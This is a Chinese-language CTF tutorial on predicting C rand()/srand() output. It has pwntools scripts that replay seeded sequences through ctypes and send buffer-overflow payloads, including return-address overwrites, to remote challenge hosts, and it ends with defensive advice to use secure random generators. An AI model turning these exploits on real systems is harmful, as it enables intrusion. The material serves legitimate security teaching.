伪随机数生成与绕过技术详解<\/h1>

1. C语言中的伪随机数生成函数<\/h2>

1.1 基本函数介绍<\/h3>
在C语言中，rand()<\/code>和srand()<\/code>函数用于生成伪随机数，定义在<stdlib.h><\/code>头文件中：<\/p>


srand()<\/code><\/strong>：初始化随机数生成器的种子<\/p>

接受一个unsigned int<\/code>类型参数作为种子<\/li>
相同的种子会导致rand()<\/code>生成相同的随机数序列<\/li>
常用当前时间作为种子：srand((unsigned int)time(NULL))<\/code><\/li>
<\/ul>
<\/li>

rand()<\/code><\/strong>：生成伪随机数<\/p>

返回0到RAND_MAX<\/code>之间的非负整数<\/li>
RAND_MAX<\/code>是一个宏定义，表示能生成的最大随机数<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 基本用法示例<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <time.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 初始化随机数生成器
<\/span><\/span><\/span><\/span>    srand((unsigned<\/span> int<\/span>)time(NULL));
<\/span><\/span>    
<\/span><\/span>    \/\/ 生成随机数
<\/span><\/span><\/span><\/span>    int<\/span> random_number =<\/span> rand();
<\/span><\/span>    printf("随机数: %d<\/span>\n<\/span>"<\/span>, random_number);
<\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.3 生成指定范围的随机数<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <time.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    srand((unsigned<\/span> int<\/span>)time(NULL));
<\/span><\/span>    
<\/span><\/span>    \/\/ 生成1到10之间的随机数
<\/span><\/span><\/span><\/span>    int<\/span> random_number =<\/span> rand() %<\/span> 10<\/span> +<\/span> 1<\/span>;
<\/span><\/span>    printf("1到10之间的随机数: %d<\/span>\n<\/span>"<\/span>, random_number);
<\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 伪随机数的可预测性<\/h2>
伪随机数实际上是确定性算法生成的，只要知道种子，就能预测整个序列：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    int<\/span> v1;
<\/span><\/span>    srand(1<\/span>);  \/\/ 固定种子
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    for<\/span>(int<\/span> i=<\/span>0<\/span>; i<=<\/span>98<\/span>; i++<\/span>) {
<\/span><\/span>        v1 =<\/span> (rand() %<\/span> 100<\/span> +<\/span> 1<\/span>);
<\/span><\/span>        printf("%d "<\/span>, v1);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>每次运行这段代码，输出的随机数序列都是相同的。<\/p>
3. 绕过伪随机数验证的技术<\/h2>
3.1 使用Python的ctypes库<\/h3>
ctypes<\/code>库可以加载动态链接库，调用其中的函数来生成相同的随机数序列：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> ctypes import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> remote("node5.anna.nssctf.cn"<\/span>, 29528<\/span>)
<\/span><\/span>my_libc =<\/span> cdll.<\/span>LoadLibrary("libc.so.6"<\/span>)
<\/span><\/span>my_libc.<\/span>srand(0x39<\/span>)  # 设置相同的种子<\/span>
<\/span><\/span>
<\/span><\/span># 生成与目标程序相同的随机数<\/span>
<\/span><\/span>payload1 =<\/span> str(my_libc.<\/span>rand()).<\/span>encode("utf-8"<\/span>)
<\/span><\/span>p.<\/span>sendline(payload1)
<\/span><\/span>
<\/span><\/span># 后续攻击代码...<\/span>
<\/span><\/span><\/code><\/pre>3.2 直接计算随机数<\/h3>
也可以直接用C语言计算随机数：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    srand(0x39<\/span>);  \/\/ 设置相同的种子
<\/span><\/span><\/span><\/span>    printf("%d"<\/span>, rand());  \/\/ 输出随机数
<\/span><\/span><\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>然后在Python脚本中使用这个值：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>, log_level=<\/span>'debug'<\/span>)
<\/span><\/span>p =<\/span> remote('node5.anna.nssctf.cn'<\/span>, 29388<\/span>)
<\/span><\/span>
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span>*<\/span>72<\/span> +<\/span> p64(0x4008B2<\/span>)
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>'name'<\/span>, b<\/span>'1956681178'<\/span>)  # 使用计算出的随机数<\/span>
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>'next?'<\/span>, payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>4. 实际CTF例题分析<\/h2>
4.1 例题1：真男人下120层<\/h3>
程序逻辑分析<\/strong>：<\/p>

获取当前时间作为种子：srand(time(0))<\/code><\/li>
生成随机数v4 = rand()<\/code><\/li>
用v4 % 3 - 1522127470<\/code>作为新种子<\/li>
循环120次，每次需要猜对1-4的随机数<\/li>
<\/ol>
绕过代码<\/strong>：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> ctypes import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> remote('node4.anna.nssctf.cn'<\/span>, 28052<\/span>)
<\/span><\/span>libc =<\/span> cdll.<\/span>LoadLibrary('\/lib\/x86_64-linux-gnu\/libc.so.6'<\/span>)
<\/span><\/span>
<\/span><\/span># 模拟目标程序的随机数生成过程<\/span>
<\/span><\/span>libc.<\/span>srand(libc.<\/span>time(0<\/span>))
<\/span><\/span>shu =<\/span> libc.<\/span>rand() %<\/span> 3<\/span> -<\/span> 1522127470<\/span>
<\/span><\/span>libc.<\/span>srand(shu)
<\/span><\/span>
<\/span><\/span># 生成120个1-4的随机数<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(120<\/span>):
<\/span><\/span>    t =<\/span> libc.<\/span>rand() %<\/span> 4<\/span> +<\/span> 1<\/span>
<\/span><\/span>    p.<\/span>sendline(str(t).<\/span>encode())
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>4.2 例题2：dice_game<\/h3>
程序逻辑分析<\/strong>：<\/p>

获取当前时间作为种子<\/li>
有缓冲区溢出漏洞<\/li>
需要猜对50次1-6的随机数<\/li>
<\/ol>
绕过代码<\/strong>：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> ctypes import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span>
<\/span><\/span>p =<\/span> remote('61.147.171.105'<\/span>, 57855<\/span>)
<\/span><\/span>libc =<\/span> cdll.<\/span>LoadLibrary('.\/libc.so.6'<\/span>)
<\/span><\/span>
<\/span><\/span># 利用溢出漏洞<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span>*<\/span>0x40<\/span> +<\/span> p64(0<\/span>)
<\/span><\/span>p.<\/span>sendlineafter('name'<\/span>, payload)
<\/span><\/span>
<\/span><\/span># 生成50个1-6的随机数<\/span>
<\/span><\/span>res =<\/span> []
<\/span><\/span>for<\/span> i in<\/span> range(50<\/span>):
<\/span><\/span>    res.<\/span>append(libc.<\/span>rand() %<\/span> 6<\/span> +<\/span> 1<\/span>)
<\/span><\/span>
<\/span><\/span>for<\/span> point in<\/span> res:
<\/span><\/span>    p.<\/span>sendlineafter('point(1~6):'<\/span>, str(point))
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>4.3 例题3：ez_game<\/h3>
程序特点<\/strong>：<\/p>

需要猜对20000次1-7的随机数<\/li>
有时间限制（14秒）<\/li>
有后门函数<\/li>
<\/ol>
优化技巧<\/strong>：<\/p>

预先计算所有随机数<\/li>
不等待回显以节省时间<\/li>
<\/ul>
优化后的代码<\/strong>：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> ctypes import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>)
<\/span><\/span>libc =<\/span> cdll.<\/span>LoadLibrary('.\/libc.so.6'<\/span>)
<\/span><\/span>
<\/span><\/span># 预先计算20001个随机数<\/span>
<\/span><\/span>libc.<\/span>srand(1<\/span>)
<\/span><\/span>res =<\/span> []
<\/span><\/span>for<\/span> i in<\/span> range(20001<\/span>):
<\/span><\/span>    res.<\/span>append(libc.<\/span>rand() %<\/span> 7<\/span> +<\/span> 1<\/span>)
<\/span><\/span>
<\/span><\/span># 连接并快速发送<\/span>
<\/span><\/span>p =<\/span> remote('27.25.151.12'<\/span>, 33356<\/span>)
<\/span><\/span>p.<\/span>sendlineafter('username:'<\/span>, b<\/span>'a'<\/span>*<\/span>8<\/span>)
<\/span><\/span>
<\/span><\/span>for<\/span> a in<\/span> res:
<\/span><\/span>    p.<\/span>sendline(str(a))  # 不等待回显<\/span>
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>5. 总结与防御建议<\/h2>
5.1 攻击总结<\/h3>

种子可预测<\/strong>：如果使用时间等可预测值作为种子，攻击者可以重现随机数序列<\/li>
种子固定<\/strong>：如果种子固定，随机数序列完全可预测<\/li>
绕过技术<\/strong>：

使用相同的库和种子重现随机数序列<\/li>
对于时间种子，需要同步时间或爆破<\/li>
对于多层随机数生成，需要完整模拟整个生成过程<\/li>
<\/ul>
<\/li>
<\/ol>
5.2 防御建议<\/h3>


使用加密安全的随机数生成器<\/strong>：<\/p>

Linux: \/dev\/random<\/code>或\/dev\/urandom<\/code><\/li>
Windows: CryptGenRandom<\/code><\/li>
OpenSSL: RAND_bytes<\/code><\/li>
<\/ul>
<\/li>

避免使用可预测的种子<\/strong>：<\/p>

不要单独使用时间作为种子<\/li>
可以组合多种熵源（时间、PID、RDTSC等）<\/li>
<\/ul>
<\/li>

关键安全操作不要依赖伪随机数<\/strong>：<\/p>

密码学操作应使用专门的加密库<\/li>
重要随机数应从安全源获取<\/li>
<\/ul>
<\/li>

代码审计时检查随机数使用<\/strong>：<\/p>

检查是否使用了不安全的随机数生成方式<\/li>
检查种子是否可预测或固定<\/li>
<\/ul>
<\/li>
<\/ol>
通过理解伪随机数的生成原理和绕过技术，安全人员可以更好地审计代码中的随机数使用，开发者也可以编写更安全的随机数生成代码。<\/p>